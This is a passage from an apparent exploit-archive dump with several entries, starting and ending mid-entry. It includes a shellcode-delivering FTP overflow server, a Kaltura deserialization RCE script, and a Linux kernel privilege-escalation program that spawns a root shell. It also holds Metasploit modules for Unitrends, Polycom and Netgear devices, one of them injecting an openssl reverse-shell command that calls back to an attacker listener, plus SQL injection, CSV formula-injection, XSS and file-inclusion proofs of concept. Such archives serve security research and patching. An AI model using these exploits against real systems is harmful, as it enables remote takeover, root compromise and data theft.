"\x7c\x6e\x49\x0c\xfb\x6f\x98\x69\xf3\x25\x81\xdb\x9c\xe3\x53"
"\x5e\xc1\x13\x8e\x9c\xfc\x97\x3b\x5c\xfb\x88\x49\x59\x47\x0f"
"\xa1\x13\xd8\xfa\xc5\x80\xd9\x2e\xa6\x47\x4a\xb2\x07\xe2\xea"
"\x51\x58")
CALL_ESP = "\xdd\xfc\x40\x00" # call esp - nftpc.exe #0040FCDD
buff = "A" * 4116 + CALL_ESP + '\x90' * 16 + shellcode + "C" * (15000-4116-4-16-len(shellcode))
#Can call esp but the null byte terminates the string.
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((IP, port))
s.listen(20)
print("[i] FTP Server started on port: "+str(port)+"\r\n")
except:
print("[!] Failed to bind the server to port: "+str(port)+"\r\n")
while True:
conn, addr = s.accept()
conn.send('220 Welcome!' + '\r\n')
print conn.recv(1024)
conn.send('331 OK.\r\n')
print conn.recv(1024)
conn.send('230 OK.\r\n')
print conn.recv(1024)
conn.send(buff + '\r\n')
print conn.recv(1024)
conn.send('257' + '\r\n')
# Exploit Title: CometChat < v6.2.0 BETA 1 - Local File Inclusion
# Date: 2017-10-22
# Exploit Author: Luke Paris (Paradoxis) <luke@paradoxis.nl>
# Vendor Homepage: https://cometchat.com/
# Version: < 6.2.0 BETA 1
# Tested on: Ubuntu Linux 14.04
#
# --------------------------------------------------------------------------------------
#
# In versions of CometChat before version v6.2.0 BETA 1 a bug existed which allowed
# any unauthorised attacker to modify the include path of a php file by sending an
# HTTP request with a crafted 'cc_lang' cookie.
#
# If successfully exploited an attacker could leverage this bug to execute arbitrary PHP
# code which resides somewhere else on the server (eg: uploaded via an upload form).
#
# Due to the fact that this bug resides in the configuration file of the applications
# it might be possible that future versions of the chat application still contain the
# file inclusion bug as the script might have been re-applied after an update.
#
# --------------------------------------------------------------------------------------
#
# The vulnerability resides in the application's configuration file, near the beginning
# of the script the following code block is executed, this is where an attacker is able
# to inject a string into the cc_lang cookie.
/* COOKIE */
$cookiePrefix = 'cc_';
/* LANGUAGE START */
$lang = 'en';
/* LANGUAGE END */
if (!empty($_COOKIE[$cookiePrefix."lang"])) {
$lang = $_COOKIE[$cookiePrefix."lang"];
}
# Near the end of the configuration file, the following code block is executed.
# This is where the exploit is triggered by not sanitising the $lang variable properly.
include dirname(__FILE__).DIRECTORY_SEPARATOR.'lang'.DIRECTORY_SEPARATOR.'en.php';
if (file_exists(dirname(__FILE__).DIRECTORY_SEPARATOR.'lang'.DIRECTORY_SEPARATOR.$lang.'.php')) {
include dirname(__FILE__).DIRECTORY_SEPARATOR.'lang'.DIRECTORY_SEPARATOR.$lang.'.php';
}
# The following example demonstrates how an attacker could leverage this bug to gain control
# over the server, which could result in a full server compromise (assuming the attacker has
# already managed to write a webshell to the servers' disk somehow):
GET /cometchat/config.php?cmd=id HTTP/1.1
Host: example.com
Connection: keep-alive
Cookie: cc_lang=../../uploads/evil
HTTP/1.1 200 OK
Host: example.com
Connection: close
Content-type: text/html; charset=UTF-8
uid=33(www-data) gid=33(www-data) groups=33(www-data)
#!/usr/bin/env python
# Kaltura <= 13.1.0 RCE (CVE-2017-14143)
# https://telekomsecurity.github.io/2017/09/kaltura-rce.html
#
# $ python kaltura_rce.py "https://example.com" 0_xxxxxxxx "system('id')"
# [~] host: https://example.com
# [~] entry_id: 0_xxxxxxxx
# [~] code: system('id')
# [+] sending request..
# uid=1003(wwwrun) gid=50004(www) groups=50004(www),7373(kaltura)
import urllib
import urllib2
import base64
import md5
import sys
cookie_secret = 'y3tAno3therS$cr3T';
def exploit(host, entry_id, php_code):
print("[+] Sending request..")
url = "{}/index.php/keditorservices/getAllEntries?list_type=15&entry_id={}".format(host, entry_id)
cmd = "{}.die();".format(php_code)
cmd_len = len(cmd)
payload = "a:1:{s:1:\"z\";O:8:\"Zend_Log\":1:{s:11:\"\0*\0_writers\";a:1:{i:0;O:20:\"Zend_Log_Writer_Mail\":5:{s:16:\"\0*\0_eventsToMail\";a:1:{i:0;i:1;}s:22:\"\0*\0_layoutEventsToMail\";a:0:{}s:8:\"\0*\0_mail\";O:9:\"Zend_Mail\":0:{}s:10:\"\0*\0_layout\";O:11:\"Zend_Layout\":3:{s:13:\"\0*\0_inflector\";O:23:\"Zend_Filter_PregReplace\":2:{s:16:\"\0*\0_matchPattern\";s:7:\"/(.*)/e\";s:15:\"\0*\0_replacement\";s:%s:\"%s\";}s:20:\"\0*\0_inflectorEnabled\";b:1;s:10:\"\0*\0_layout\";s:6:\"layout\";}s:22:\"\0*\0_subjectPrependText\";N;}}};}"
exploit_code = payload % (len(cmd), cmd)
encoded = base64.b64encode(exploit_code)
md5_hash = md5.new("%s%s" % (encoded, cookie_secret)).hexdigest()
cookies={'userzone': "%s%s" % (encoded, md5_hash)}
r = urllib2.Request(url)
r.add_header('Cookie', urllib.urlencode(cookies))
req = urllib2.urlopen(r)
return req.read()
if __name__ == '__main__':
if len(sys.argv) < 4:
print("Usage: %s <host> <entry_id> <php_code>" % sys.argv[0])
print(" example: %s http://example.com 0_abc1234 system('id')" % sys.argv[0])
sys.exit(0)
host = sys.argv[1]
entry_id = sys.argv[2]
cmd = sys.argv[3]
print("[~] host: %s" % host)
print("[~] entry_id: %s" % entry_id)
print("[~] php_code: %s" % cmd)
result = exploit(sys.argv[1], sys.argv[2], sys.argv[3])
print(result)
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <string.h>
struct cred;
struct task_struct;
typedef struct cred *(*prepare_kernel_cred_t) (struct task_struct *daemon) __attribute__((regparm(3)));
typedef int (*commit_creds_t) (struct cred *new) __attribute__((regparm(3)));
prepare_kernel_cred_t prepare_kernel_cred;
commit_creds_t commit_creds;
void get_shell() {
char *argv[] = {"/bin/sh", NULL};
if (getuid() == 0){
printf("[+] Root shell success !! :)\n");
execve("/bin/sh", argv, NULL);
}
printf("[-] failed to get root shell :(\n");
}
void get_root() {
if (commit_creds && prepare_kernel_cred)
commit_creds(prepare_kernel_cred(0));
}
unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[256];
int ret = 0;
f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
printf("[-] Failed to open /proc/kallsyms\n");
exit(-1);
}
printf("[+] Find %s...\n", name);
while(ret != EOF) {
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
if (ret == 0) {
fscanf(f, "%s\n", sname);
continue;
}
if (!strcmp(name, sname)) {
fclose(f);
printf("[+] Found %s at %lx\n", name, addr);
return addr;
}
}
fclose(f);
return 0;
}
int main(int ac, char **av)
{
if (ac != 2) {
printf("./exploit kernel_offset\n");
printf("exemple = 0xffffffff81f3f45a");
return EXIT_FAILURE;
}
// 2 - Appel de la fonction get_kernel_sym pour rcuperer dans le /proc/kallsyms les adresses des fonctions
prepare_kernel_cred = (prepare_kernel_cred_t)get_kernel_sym("prepare_kernel_cred");
commit_creds = (commit_creds_t)get_kernel_sym("commit_creds");
// have_canfork_callback offset <= rendre dynamique aussi
pid_t pid;
/* siginfo_t info; */
// 1 - Mapper la mmoire l'adresse 0x0000000000000000
printf("[+] Try to allocat 0x00000000...\n");
if (mmap(0, 4096, PROT_READ|PROT_WRITE|PROT_EXEC,MAP_ANON|MAP_PRIVATE|MAP_FIXED, -1, 0) == (char *)-1){
printf("[-] Failed to allocat 0x00000000\n");
return -1;
}
printf("[+] Allocation success !\n");
/* memset(0, 0xcc, 4096); */
/*
movq rax, 0xffffffff81f3f45a
movq [rax], 0
mov rax, 0x4242424242424242
call rax
xor rax, rax
ret
replace 0x4242424242424242 by get_root
https://defuse.ca/online-x86-assembler.htm#disassembly
*/
unsigned char shellcode[] =
{ 0x48, 0xC7, 0xC0, 0x5A, 0xF4, 0xF3, 0x81, 0x48, 0xC7, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0xB8, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0x42, 0xFF, 0xD0, 0x48, 0x31, 0xC0, 0xC3 };
void **get_root_offset = rawmemchr(shellcode, 0x42);
(*get_root_offset) = get_root;
memcpy(0, shellcode, sizeof(shellcode));
/* strcpy(0, "\x48\x31\xC0\xC3"); // xor rax, rax; ret */
if(-1 == (pid = fork())) {
perror("fork()");
return EXIT_FAILURE;
}
if(pid == 0) {
_exit(0xDEADBEEF);
perror("son");
return EXIT_FAILURE;
}
siginfo_t *ptr = (siginfo_t*)strtoul(av[1], (char**)0, 0);
waitid(P_PID, pid, ptr, WEXITED | WSTOPPED | WCONTINUED);
// TRIGGER
pid = fork();
printf("fork_ret = %d\n", pid);
if (pid > 0)
get_shell();
return EXIT_SUCCESS;
}
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Unitrends UEB 9 http api/storage remote root',
'Description' => %q{
It was discovered that the api/storage web interface in Unitrends Backup (UB)
before 10.0.0 has an issue in which one of its input parameters was not validated.
A remote attacker could use this flaw to bypass authentication and execute arbitrary
commands with root privilege on the target system.
},
'Author' =>
[
'Cale Smith', # @0xC413
'Benny Husted', # @BennyHusted
'Jared Arave' # @iotennui
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ARCH_X86],
'CmdStagerFlavor' => [ 'printf' ],
'References' =>
[
['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000TO5PAAW/000005756'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12478'],
['CVE', '2017-12478'],
],
'Targets' =>
[
[ 'UEB 9.*', { } ]
],
'Privileged' => true,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
'SSL' => true
},
'DisclosureDate' => 'Aug 8 2017',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, 'Use SSL', true])
])
deregister_options('SRVHOST', 'SRVPORT')
end
#substitue some charactes
def filter_bad_chars(cmd)
cmd.gsub!("\\", "\\\\\\")
cmd.gsub!("'", '\\"')
end
def execute_command(cmd, opts = {})
session = "v0:b' UNION SELECT -1 -- :1:/usr/bp/logs.dir/gui_root.log:0" #SQLi auth bypass
session = Base64.strict_encode64(session) #b64 encode session token
#substitue the cmd into the hostname parameter
parms = %Q|{"type":4,"name":"_Stateless","usage":"stateless","build_filesystem":1,"properties":{"username":"aaaa","password":"aaaa","hostname":"`|
parms << filter_bad_chars(cmd)
parms << %Q|` &","port":"2049","protocol":"nfs","share_name":"aaa"}}|
res = send_request_cgi({
'uri' => '/api/storage',
'method' => 'POST',
'ctype' => 'application/json',
'encode_params' => false,
'data' => parms,
'headers' =>
{'AuthToken' => session}
})
if res && res.code != 500
fail_with(Failure::UnexpectedReply,'Unexpected response')
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
def exploit
print_status("#{peer} - pwn'ng ueb 9....")
execute_cmdstager(:linemax => 120)
end
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Polycom Command Shell Authorization Bypass',
'Alias' => 'polycom_hdx_auth_bypass',
'Author' =>
[
'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # module
'h00die <mike@shorebreaksecurity.com>', # submission/cleanup
],
'DisclosureDate' => 'Jan 18 2013',
'Description' => %q(
The login component of the Polycom Command Shell on Polycom HDX
video endpoints, running software versions 3.0.5 and earlier,
is vulnerable to an authorization bypass when simultaneous
connections are made to the service, allowing remote network
attackers to gain access to a sandboxed telnet prompt without
authentication. Versions prior to 3.0.4 contain OS command
injection in the ping command which can be used to execute
arbitrary commands as root.
),
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Polycom%20HDX%20Telnet%20Authorization%20Bypass%20-%20RELEASE.pdf' ],
[ 'URL', 'http://blog.tempest.com.br/joao-paulo-campello/polycom-web-management-interface-os-command-injection.html' ],
[ 'EDB', '24494']
],
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => true,
'Targets' => [ [ "Universal", {} ] ],
'Payload' =>
{
'Space' => 8000,
'DisableNops' => true,
'Compat' => { 'PayloadType' => 'cmd' }
},
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_openssl' },
'DefaultTarget' => 0
)
)
register_options(
[
Opt::RHOST(),
Opt::RPORT(23),
OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]),
OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ])
], self.class
)
register_advanced_options(
[
OptInt.new('THREADS', [false, 'Threads for authentication bypass', 6]),
OptInt.new('MAX_CONNECTIONS', [false, 'Threads for authentication bypass', 100])
], self.class
)
end
def check
connect
sock.put(Rex::Text.rand_text_alpha(rand(5) + 1) + "\n")
Rex.sleep(1)
res = sock.get_once
disconnect
if !res && !res.empty?
return Exploit::CheckCode::Safe
end
if res =~ /Welcome to ViewStation/
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def exploit
# Keep track of results (successful connections)
results = []
# Random string for password
password = Rex::Text.rand_text_alpha(rand(5) + 1)
# Threaded login checker
max_threads = datastore['THREADS']
cur_threads = []
# Try up to 100 times just to be sure
queue = [*(1..datastore['MAX_CONNECTIONS'])]
print_status("Starting Authentication bypass with #{datastore['THREADS']} threads with #{datastore['MAX_CONNECTIONS']} max connections ")
until queue.empty?
while cur_threads.length < max_threads
# We can stop if we get a valid login
break unless results.empty?
# keep track of how many attempts we've made
item = queue.shift
# We can stop if we reach max tries
break unless item
t = Thread.new(item) do |count|
sock = connect
sock.put(password + "\n")
res = sock.get_once
until res.empty?
break unless results.empty?
# Post-login Polycom banner means success
if res =~ /Polycom/
results << sock
break
# bind error indicates bypass is working
elsif res =~ /bind/
sock.put(password + "\n")
# Login error means we need to disconnect
elsif res =~ /failed/
break
# To many connections means we need to disconnect
elsif res =~ /Error/
break
end
res = sock.get_once
end
end
cur_threads << t
end
# We can stop if we get a valid login
break unless results.empty?
# Add to a list of dead threads if we're finished
cur_threads.each_index do |ti|
t = cur_threads[ti]
unless t.alive?
cur_threads[ti] = nil
end
end
# Remove any dead threads from the set
cur_threads.delete(nil)
Rex.sleep(0.25)
end
# Clean up any remaining threads
cur_threads.each { |sock| sock.kill }
if !results.empty?
print_good("#{rhost}:#{rport} Successfully exploited the authentication bypass flaw")
do_payload(results[0])
else
print_error("#{rhost}:#{rport} Unable to bypass authentication, this target may not be vulnerable")
end
end
def do_payload(sock)
# Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])
# Start a listener
start_listener(true)
# Figure out the port we picked
cbport = self.service.getsockname[2]
# Utilize ping OS injection to push cmd payload using stager optimized for limited buffer < 128
cmd = "\nping ;s=$IFS;openssl${s}s_client$s-quiet$s-host${s}#{cbhost}$s-port${s}#{cbport}|sh;ping$s-c${s}1${s}0\n"
sock.put(cmd)
# Give time for our command to be queued and executed
1.upto(5) do
Rex.sleep(1)
break if session_created?
end
end
def stage_final_payload(cli)
print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...")
cli.put(payload.encoded + "\n")
end
def start_listener(ssl = false)
comm = datastore['ListenerComm']
if comm == 'local'
comm = ::Rex::Socket::Comm::Local
else
comm = nil
end
self.service = Rex::Socket::TcpServer.create(
'LocalPort' => datastore['CBPORT'],
'SSL' => ssl,
'SSLCert' => datastore['SSLCert'],
'Comm' => comm,
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self
}
)
self.service.on_client_connect_proc = proc { |client|
stage_final_payload(client)
}
# Start the listening service
self.service.start
end
# Shut down any running services
def cleanup
super
if self.service
print_status("Shutting down payload stager listener...")
begin
self.service.deref if self.service.is_a?(Rex::Service)
if self.service.is_a?(Rex::Socket)
self.service.close
self.service.stop
end
self.service = nil
rescue ::Exception
end
end
end
# Accessor for our TCP payload stager
attr_accessor :service
end
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Unitrends UEB bpserverd authentication bypass RCE',
'Description' => %q{
It was discovered that the Unitrends bpserverd proprietary protocol, as exposed via xinetd,
has an issue in which its authentication can be bypassed. A remote attacker could use this
issue to execute arbitrary commands with root privilege on the target system.
},
'Author' =>
[
'Jared Arave', # @iotennui
'Cale Smith', # @0xC413
'Benny Husted' # @BennyHusted
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => [ARCH_X86],
'CmdStagerFlavor' => [ 'printf' ],
'References' =>
[
['URL', 'https://support.unitrends.com/UnitrendsBackup/s/article/ka640000000CcZeAAK/000005755'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2017-12477'],
['CVE', '2017-12477'],
],
'Targets' =>
[
[ 'UEB 9.*', { } ]
],
'Privileged' => true,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
'SSL' => false
},
'DisclosureDate' => 'Aug 8 2017',
'DefaultTarget' => 0))
register_options([
Opt::RPORT(1743)
])
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
s1 = connect(global = false)
buf1 = s1.get_once(-1).to_s
#parse out the bpd port returned
bpd_port = buf1[-8..-3].to_i
#check if it's a valid port number (1-65534)
if bpd_port && bpd_port >= 1 && bpd_port <= 65535
Exploit::CheckCode::Detected
else
Exploit::CheckCode::Safe
end
end
def execute_command(cmd, opts = {})
#append a comment, ignore everything after our cmd
cmd = cmd + " #"
# build the attack buffer...
command_len = cmd.length + 3
packet_len = cmd.length + 23
data = "\xa5\x52\x00\x2d"
data << "\x00\x00\x00"
data << packet_len
data << "\x00\x00\x00"
data << "\x01"
data << "\x00\x00\x00"
data << "\x4c"
data << "\x00\x00\x00"
data << command_len
data << cmd
data << "\x00\x00\x00"
begin
print_status("Connecting to xinetd for bpd port...")
s1 = connect(global = false)
buf1 = s1.get_once(-1).to_s
#parse out the bpd port returned, we will connect back on this port to send our cmd
bpd_port = buf1[-8..-3].to_i
print_good("bpd port recieved: #{bpd_port}")
vprint_status("Connecting to #{bpd_port}")
s2 = connect(global = false, opts = {'RPORT'=>bpd_port})
vprint_good('Connected!')
print_status('Sending command buffer to xinetd')
s1.put(data)
s2.get_once(-1,1).to_s
disconnect(s1)
disconnect(s2)
rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e
fail_with(Failure::Unreachable, "#{peer} - Connection to server failed")
end
end
def exploit
print_status("#{peer} - pwn'ng ueb 9....")
execute_cmdstager(:linemax => 200)
end
end
# Exploit Title: FS Trademe Clone - 'id' SQL Injection
# Date: 2017-10-24
# Exploit Author: 8bitsec
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/trademe-clone/
# Version: 24 October 17
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-10-24
Product & Service Introduction:
===============================
This is possibly the only software solution to facilitate launching of a portal with features like auction, eCommerce, B2B, Real Estate, Job Portal and classifieds all in one similar to Trademe.
Technical Details & Description:
================================
SQL injection on [id] parameter.
Proof of Concept (PoC):
=======================
SQLi:
https://localhost/[path]/property_details.php?id=12 AND 3616=3616
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=12 AND 3616=3616
==================
8bitsec - [https://twitter.com/_8bitsec]
# Exploit Title: FS Monster Clone - 'id' SQL Injection
# Date: 2017-10-24
# Exploit Author: 8bitsec
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/monster-clone/
# Version: 24 October 17
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-10-24
Product & Service Introduction:
===============================
A highly sought after W3 compliant web solution standing out tall with a host of exciting features packed in.
Technical Details & Description:
================================
SQL injection on [id] parameter.
Proof of Concept (PoC):
=======================
SQLi:
https://localhost/[path]/Job_Details.php?id=6 AND 9364=9364
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=6 AND 9364=9364
==================
8bitsec - [https://twitter.com/_8bitsec]
# Exploit Title: FS Care Clone - 'sitterService' SQL Injection
# Date: 2017-10-24
# Exploit Author: 8bitsec
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/care-clone/
# Version: 24 October 17
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-10-24
Product & Service Introduction:
===============================
This product brings the most ideal solution to launch a portal dealing with every aspect of hiring care in a hasslefree manner.
Technical Details & Description:
================================
SQL injection on [sitterService] parameter.
Proof of Concept (PoC):
=======================
SQLi:
https://localhost/[path]/searchJob.php?sitterService=1' AND 2728=2728 AND 'fhir'='fhir
Parameter: sitterService (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: sitterService=1' AND 2728=2728 AND 'fhir'='fhir
==================
8bitsec - [https://twitter.com/_8bitsec]
# Exploit Title: FS Realtor Clone - 'id' SQL Injection
# Date: 2017-10-24
# Exploit Author: 8bitsec
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/realtor-clone/
# Version: 24 October 17
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-10-24
Product & Service Introduction:
===============================
The realtor business anywhere is dependent essentially on the support provided by a robust digital platform offering diverse solutions at fingertips.
Technical Details & Description:
================================
SQL injection on [id] parameter.
Proof of Concept (PoC):
=======================
SQLi:
https://localhost/[path]/property_detail.php?id=29 AND 4599=4599
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=29 AND 4599=4599
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=29 AND SLEEP(5)
==================
8bitsec - [https://twitter.com/_8bitsec]
# Exploit Title: FS Crowdfunding Script - 'id' SQL Injection
# Date: 2017-10-24
# Exploit Author: 8bitsec
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/crowdfunding-script/
# Version: 24 October 17
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-10-24
Product & Service Introduction:
===============================
Fortune Crowdfunding Script is a popular crowdfunding script developed in jQuery, PHP and MySQL.
Technical Details & Description:
================================
SQL injection on [id] parameter.
Proof of Concept (PoC):
=======================
SQLi:
https://localhost/[path]/page_running_projects_details.php?id=11' AND 5391=5391 AND 'Qkwz'='Qkwz
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=11' AND 5391=5391 AND 'Qkwz'='Qkwz
==================
8bitsec - [https://twitter.com/_8bitsec]
# Exploit Title: KeystoneJS 4.0.0-beta.5 Unauthenticated CSV Injection
# Vendor Homepage: http://keystonejs.com/
# Exploit Author: Ishaq Mohammed
# Contact: https://twitter.com/security_prince
# Website: https://about.me/security-prince
# Category: WEBAPPS
# Platform: Node.js
# CVE: CVE-2017-15879
Vendor Description:
KeystoneJS is a powerful Node.js content management system and web app
framework built on express and mongoose. Keystone makes it easy to create
sophisticated web sites and apps, and comes with a beautiful auto-generated
Admin UI.
Source: https://github.com/keystonejs/keystone/blob/master/README.md
Technical Details and Exploitation:
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in
admin/server/api/download.js and lib/list/getCSVData.js in KeystoneJS
before 4.0.0-beta.7 via a value that is mishandled in a CSV export.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15879
Proof of Concept:
1.Go to Contact Us page and insert the below payload in the Name Field.
Payload: @SUM(1+1)*cmd|' /C calc'!A0
2. Login as Admin
3. Now Navigate to Enquiries page and check the entered payload.
4. Download as .csv, once done open it in excel and observe that calculator
application gets open.
Solution:
The issues have been fixed and the vendor has released the patches
https://github.com/keystonejs/keystone/pull/4478/commits/1b791d55839ebf434e104cc9936ccb8c29019231
Reference:
https://github.com/keystonejs/keystone/pull/4478
https://securelayer7.net/download/pdf/KeystoneJS-Pentest-Report-SecureLayer7.pdf
--
Best Regards,
Ishaq Mohammed
https://about.me/security-prince
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'Netgear DGN1000 Setup.cgi Unauthenticated RCE',
'Description' => %q{
This module exploits an unauthenticated OS command execution vulneralbility
in the setup.cgi file in Netgear DGN1000 firmware versions up to 1.1.00.48, and
DGN2000v1 models.
},
'Author' => [
'Mumbai <https://github.com/realoriginal>', # module
'Robort Palerie <roberto@greyhats.it>' # vuln discovery
],
'References' => [
['EDB', '25978'],
],
'DisclosureDate' => 'Jun 5 2013',
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'linux/mipsbe/meterpreter/reverse_tcp'
},
'Privileged' => true,
'Payload' => {
'DisableNops' => true,
},
'Targets' => [[ 'Automatic', {} ]],
))
end
def check
begin
res = send_request_cgi({
'uri' => '/setup.cgi',
'method' => 'GET'
})
if res && res.headers['WWW-Authenticate']
auth = res.headers['WWW-Authenticate']
if auth =~ /DGN1000/
return Exploit::CheckCode::Detected
end
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Connecting to target...")
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to access vulnerable URL")
end
print_status("#{peer} - Exploiting target ....")
execute_cmdstager(
:flavor => :wget,
:linemax => 200,
:concat_operator => " && "
)
end
def execute_command(cmd, opts)
begin
res = send_request_cgi({
'uri' => '/setup.cgi',
'method' => 'GET',
'vars_get' => {
'next_file' => 'netgear.cfg',
'todo' => 'syscmd',
'cmd' => cmd.to_s,
'curpath' => '/',
'currentsetting.htm' => '1'
}
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end
# Exploit Title: KeystoneJS 4.0.0-beta.5 Unauthenticated Stored XSS
# Vendor Homepage: http://keystonejs.com/
# Exploit Author: Ishaq Mohammed
# Contact: https://twitter.com/security_prince
# Website: https://about.me/security-prince
# Category: WEBAPPS
# Platform: Node.js
# CVE: CVE-2017-15878
Vendor Description:
KeystoneJS is a powerful Node.js content management system and web app
framework built on express and mongoose. Keystone makes it easy to create
sophisticated web sites and apps, and comes with a beautiful auto-generated
Admin UI.
Source: https://github.com/keystonejs/keystone/blob/master/README.md
Technical Details and Exploitation:
A cross-site scripting (XSS) vulnerability exists in
fields/types/markdown/MarkdownType.js in KeystoneJS before 4.0.0-beta.7 via
the Contact Us feature.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15878
Proof of Concept:
1. Navigate to Contact Us page
2. Fill in the details needed and enter the below payload in message field
and send
<a onmouseover=alert(document.cookie)>XSS link</a>
3. Now login as admin and navigate to the above new record created in the
enquiries
4. Move the cursor on the text “XSS link”
Solution:
The issues have been fixed and the vendor has released the patches
https://github.com/keystonejs/keystone/pull/4478/commits/5cb6405dfc0b6d59003c996f8a4aa35baa6b2bac
Reference:
https://github.com/keystonejs/keystone/pull/4478
https://securelayer7.net/download/pdf/KeystoneJS-Pentest-Report-SecureLayer7.pdf
# Exploit Title: PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)
# Date: 2017-10-25
# Exploit Author: Maciek Krupa
# All credit only to Yongxiang Li of Asiasecurity
# Software Link: https://github.com/PHPMailer/PHPMailer
# Version: 5.2.21
# Tested on: Linux Debian 9
# CVE : CVE-2017-5223
// PoC //
It requires a contact form that sends HTML emails and allows to send a copy to your e-mail
// vulnerable form example //
<?php
require_once('class.phpmailer.php'); // PHPMailer <= 5.2.21
if (isset($_POST['your-name'], $_POST['your-email'], $_POST['your-message'])) {
$mail = new PHPMailer();
$mail->SetFrom($_POST["your-email"], $_POST["your-name"]);
$address = "admin@localhost";
$mail->AddAddress($address, "root");
if (isset($_POST['cc'])) $mail->AddCC($_POST["your-email"], $_POST["your-name"]);
$mail->Subject = "PHPMailer <= 5.2.21 - Local File Disclosure (CVE-2017-5223)";
$mail->MsgHTML($_POST["your-message"]);
if(!$mail->Send()) echo "Error: ".$mail->ErrorInfo; else echo "Sent!";
